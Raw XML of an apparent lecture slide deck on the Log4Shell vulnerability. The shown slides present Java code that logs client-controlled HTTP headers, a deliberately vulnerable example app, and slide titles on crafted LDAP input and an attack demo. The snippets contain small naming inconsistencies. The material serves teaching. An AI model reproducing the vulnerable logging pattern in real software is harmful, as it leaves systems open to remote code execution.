                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Log the User-Agent header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpExchange.getRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.info("User-Agent: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Log the Cookies header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpExchange.getRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“Cookies");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.info("Cookies: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Log the X-Api-Server header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>httpExchange.getRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>X-Api-Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.info("X-Api-Server: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apiServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344BDF9A-0274-11B6-8027-D63DAF13427D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10582032" y="1204159"/>
            <a:ext cx="872355" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1E4B5F-42B8-9098-5CB8-7E9774CF35A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="1"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5998308" y="1388825"/>
            <a:ext cx="4583724" cy="43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DD0395-EBDC-6C9E-D5BE-39ABBCC5BA31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10781325" y="3429000"/>
            <a:ext cx="977191" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996C4643-52F1-0CFD-1ADF-72C091DA4300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7705970" y="3681134"/>
            <a:ext cx="3001107" cy="68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F95AAF2-37F3-3C7D-232B-5AC7D24F27E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8468440" y="4793604"/>
            <a:ext cx="3090513" cy="2031325"/>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800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>X-Api-Server are input data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>controlled from a client (HTTP request). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>How attackers craft input will be discussed later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607EB9E6-8F27-FC86-B85C-D8AED0C92F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7557477" y="4793604"/>
            <a:ext cx="910964" cy="4348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90A21D56-21FB-E3F0-E6F7-05D4A19AFFAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7018215" y="5469175"/>
            <a:ext cx="1450226" cy="6411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E937AFAA-B291-320C-69B5-B7B16272DD74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7557477" y="5668229"/>
            <a:ext cx="910964" cy="82464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8826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9293-E137-0A01-E1AD-5234103E8FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A simple web application with a vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{427BCB36-41E6-D162-26DF-F5C037725048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7548664" y="1825624"/>
            <a:ext cx="3805136" cy="4535203"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A part of a web application written in Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>uses Spring Framework, commonly used for building web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It's a basic example of how web applications can handle and respond to HTTP requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Logs information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The code defines a method that handles GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (from clients/users) to the root URL of a web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>extracts the API version from an HTTP header, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>logs the API version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>responds with a "Hello, world!" message to the client. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB37CCD-6E90-7783-C8C6-E034B36553B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780302" y="1699480"/>
            <a:ext cx="6645216" cy="4793395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC91129B-96CD-E554-D17B-B71F52A12512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524057" y="6369620"/>
            <a:ext cx="6377666" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://github.com/christophetd/log4shell-vulnerable-app/blob/main/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C000124-0A4A-3953-703C-F901995A3295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532923" y="3103881"/>
            <a:ext cx="2774462" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Logging info to help developers keep track of what's happening in the application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2849589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3903</TotalTime>
  <Words>2444</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>222</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Unicode MS</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Söhne Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>OCRB</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Log4Shell Vulnerability </vt:lpstr>
      <vt:lpstr>Introduction to Log4Shell vulnerability &amp; attack</vt:lpstr>
      <vt:lpstr>What is Log4Shell vulnerability?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How does the Log4Shell  attack work?</vt:lpstr>
      <vt:lpstr>Challenges to launch Log4Shell attack</vt:lpstr>
      <vt:lpstr>Attackers need to identify vulnerable Code</vt:lpstr>
      <vt:lpstr>A simple web application with a vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attackers need to exploit the vulnerable code</vt:lpstr>
      <vt:lpstr>What is special about the crafted input to a program by attackers?</vt:lpstr>
      <vt:lpstr>The pattern of a crafted input ‘‘ to a web app</vt:lpstr>
      <vt:lpstr>A specific input ${…} using LDAP</vt:lpstr>
      <vt:lpstr>A specific input using an LDAP server</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Log4Shell Attack Demo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2023-09-13T15:05:49Z</dcterms:modified>
</cp:coreProperties>
</file>